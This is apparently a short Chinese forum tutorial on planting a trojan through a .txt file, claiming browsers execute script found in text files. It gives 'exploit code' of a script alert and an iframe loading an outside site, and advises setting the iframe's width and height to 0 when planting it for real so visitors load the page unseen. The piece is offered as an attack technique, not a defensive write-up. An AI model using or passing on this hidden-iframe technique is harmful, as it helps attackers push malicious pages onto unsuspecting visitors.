我們平常掛馬無外乎就那么幾種方式,如框架掛馬、js掛馬、css掛馬.txt不是文本文件嗎?它如何掛馬?且聽我慢慢道來,很簡單的說.如果有人給你發個一個類似http://www.xxx.com/test.txt的鏈接,你敢不敢打開？如果你覺得這只是一個txt文件,打開就打開,沒有什么好怕的,那是因為你還沒聽說過txt文件掛馬,如果你聽說過,那么你就不會這么大膽了.
    我們把以下代碼保存為test.txt
    PS:為了顯示,所以把width,height的值才設的那么大的.真正掛馬的話最好設成0
然后把test.txt上傳到web空間中,訪問一下,在框架中打開了百度這死Y.

    這可能要算瀏覽器的一個小BUG,在txt文件中只要加上SCRIPT,瀏覽器就會把它認為是HTML文件,就會解析執行

    利用代碼: <script>alert(jk)</script>

            <iframe src=http://www.jk1986.cn width=500 height=500></iframe>